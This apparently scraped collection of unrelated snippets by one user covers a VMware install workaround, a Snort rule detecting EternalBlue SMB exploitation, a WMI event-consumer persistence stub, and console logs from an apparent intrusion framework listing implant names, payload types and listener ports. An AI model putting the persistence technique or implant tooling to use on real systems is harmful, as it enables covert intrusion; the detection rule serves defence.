misterch0c

0xce49849306Ba415b5b7DB7fF3c850241c69bc0e7

misterch0c

before installation:

# sed 's/gcc version 7/gcc version 6/' /proc/version > /tmp/version
# mount --bind /tmp/version /proc/version

now install/ reinstall ...

# umount /proc/version && rm /tmp/version

# cp -r /usr/lib/vmware-installer/2.1.0/lib/lib/libexpat.so.0 /usr/lib/vmware/lib 

misterch0c

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"OS-WINDOWS Microsoft Windows SMB remote code execution attempt"; flow:to_server,established; content:"|FF|SMB3|00 00 00 00|"; depth:9; offset:4; byte_extract:2,26,TotalDataCount,relative,little; byte_test:2,>,TotalDataCount,20,relative,little; metadata:policy balanced-ips drop, policy connectivity-ips drop, policy security-ips drop, ruleset community, service netbios-ssn; reference:cve,2017-0144; reference:cve,2017-0146; reference:url,isc.sans.edu/forums/diary/ETERNALBLUE+Possible+Window+SMB+Buffer+Overflow+0Day/22304/; reference:url,technet.microsoft.com/en-us/security/bulletin/MS17-010; classtype:attempted-admin; sid:41978; rev:3;)

misterch0c

#pragma namespace ("\\\\.\\Root\\cimv2")

class MSClassConsumer71
{
  [key] string Name;
};

class ActiveScriptEventConsumer : __EventConsumer
{
  [key] string Name;

misterch0c

ImplantIndependent: 
Special: 
StraitBizarre: 
UnitedRake: 
  UR ToggleFA Return Code: 0x6
FlewAvenue: 
  Legacy: 
  KillSuit: 
CritterFrenzy: 
DiveBar: 

misterch0c

Enter menu option: [0]
3
Running command 'registryquery -hive l -key "Software\Classes\CLSID\{091FD378-422D-A36E-8487-83B57ADD2109}\TypeLib"'
Failed to open registry key
The system cannot find the file specified.

    *** Command indicated failure ***
- Special registry key NOT present.
Continue?
CONTINUE

misterch0c

01:06:52>> pc_prep -sharedlib
[01:06:52] ID: 2744 'python' started [target: z0.0.0.20]
- Possible payloads:
-      0) - Quit
-      1) - Standard TCP (i386-winnt Level3 sharedlib)
-      2) - HTTP Proxy (i386-winnt Level3 sharedlib)
-      3) - Standard TCP (x64-winnt Level3 sharedlib)
-      4) - HTTP Proxy (x64-winnt Level3 sharedlib)
-      5) - Standard TCP Generic (i386-winnt Level4 sharedlib)
-      6) - HTTP Proxy Generic (i386-winnt Level4 sharedlib)

misterch0c

archive file header
magicNumber:            0x12345678

read/write stats:       
pos_write_pointer:      0x0000014c
pos_read_pointer:       0x00000120
wrap_count:             0x00000000
num_health_events:      0x00000000
last_data_block_key:    0x00000840
file_time_stamp:        07/14/2009  01:20:36

misterch0c

[22:59:16] ID: 1125 'pc_listen' started [target: z0.0.0.1]
Waiting for connection...
Setting Sockopt
	Listening on [0.0.0.0]:443.
Setting Sockopt
	Listening on [0.0.0.0]:80.
Setting Sockopt
	Listening on [0.0.0.0]:53.
Setting Sockopt
	Listening on [0.0.0.0]:1509.

misterch0c

21:25:59>> aliases
[21:25:59] ID: 331 'aliases' started [target: z0.0.0.1]
acquiretoken         : LOCAL            : script _AcquireToken.dss %%cmd_args%%
acquiretoken         : ANY_REMOTE       : script _AcquireToken.dss %%cmd_args%%
arparp               : LOCAL            : python windows/arparp.py -args " %%cmd_args%% " -project Ops
arparp               : ANY_REMOTE       : python windows/arparp.py -args " %%cmd_args%% " -project Ops
channels             : LOCAL            : commands %%cmd_args%%
channels             : ANY_REMOTE       : commands %%cmd_args%%
checkpsp             : LOCAL            : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops
checkpsp             : ANY_REMOTE       : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops